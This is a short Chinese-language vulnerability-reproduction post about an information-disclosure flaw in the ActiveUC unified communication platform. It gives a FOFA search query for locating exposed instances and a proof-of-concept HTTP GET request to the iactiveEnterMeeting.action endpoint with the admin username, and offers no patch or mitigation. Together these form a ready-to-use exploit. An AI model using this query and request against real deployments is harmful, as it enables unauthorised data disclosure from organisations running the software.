【漏洞复现】网动统一通信平台ActiveUC存在信息泄露漏洞

4个月前发布

130

网动统一通信平台（Active UC）是一款集成文字、语音、视频等多种沟通方式的企业级通信平台，旨在提升用户沟通效率和便利性。该平台支持多种通信设备和协议，具有高度的兼容性和灵活性，能够适应不同的网络环境和工作需求。通过将VoIP电话、电子邮件等多种沟通方式融合在一个统一的界面中，网动统一通信平台为企业提供了一个高效、便捷的沟通环境，助力提升团队协作和生产力。

FOFA语法：

title="网动统一通信平台 （Active UC）"

poc：

GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i

评分

欢迎为Ta评分